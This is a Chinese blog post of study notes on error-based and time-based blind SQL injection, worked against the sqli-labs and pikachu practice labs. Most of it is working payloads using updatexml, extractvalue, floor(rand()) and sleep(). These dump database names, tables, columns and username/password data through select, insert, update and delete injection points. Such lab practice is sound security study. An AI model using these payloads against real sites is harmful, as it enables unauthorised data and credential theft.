sql报错盲注随笔-各类型payload-延时注入


0x00 sqli-labs-less5-6考点

注入之前首先介绍两个函数
extractvalue() :对XML文档进行查询的函数
updatexml()函数与extractvalue()类似,是更新xml文档的函数。

其中database()这个位置函数便是我们注入语句查询的地方,类似与前面的联合查询方式,但是此处应该用连接符and来连接语句,不然会报语法错误

id=1"  and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

updatexml函数

?id=1" and  extractvalue(1,concat(0x7e,(select database()),0x7e))--+

extractvalue函数

0x01 注入测试

less-6实例

查库
id=1"  and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
?id=1" or updatexml(1,concat(0x7e,(database())),0) or"--+
查表 
?id=1"  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security' limit 0,1),0x7e),1)--+
?id=1"  or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security' limit 0,1),0x7e),1) or"
查列
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) --+
?id=1" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1)or"
查数据
?id=1"  and updatexml(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e),1)--+
?id=1"  or updatexml(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e),1)or"

less-6
第五关与第六关闭合方式不一样,也可以用报错注入,就不在shuom
less-5
手工测试完成后,我尝试了使用sqlmap,工具用起来还是比手工方便很多,按照之前文章介绍的使用方法很快便测试完成
sqlmap注入less-6

0x02 重点理解:

我们可以通过以上查询方式与网站应用的关系 总结出五种

注入点产生地方或应用猜测到对方的SQL查询方式

select 查询数据

在网站应用中进行数据显示查询操作

例:select * from news where id=$id

insert 插入数据

在网站应用中进行用户注册添加等操作

例:insert into news(id,url,text) values(2,‘x’,’$t’)

delete 删除数据

后台管理里面删除文章删除用户等操作

例:delete from news where id=$id

update 更新数据

会员或后台中心数据同步或缓存等操作

例:update user set pwd=’$p’ where id=2 and username=‘admin’

order by 排序数据

一般结合表名或列名进行数据排序操作

例:select * from news order by $id

例:select id,name,price from news order by $order

0x03 各类型Payload: 靶场pikachu(利用注意修改闭合方式)

pikachu insert 插入数据

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '
username=x' or updatexml(1,concat(0x7e,(version())),0) or '
username=x' or extractvalue(1,concat(0x7e,database())) or '

pikachu update 更新数据

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or  updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete 删除数据

/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)
/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))

延时盲注:

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+

文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录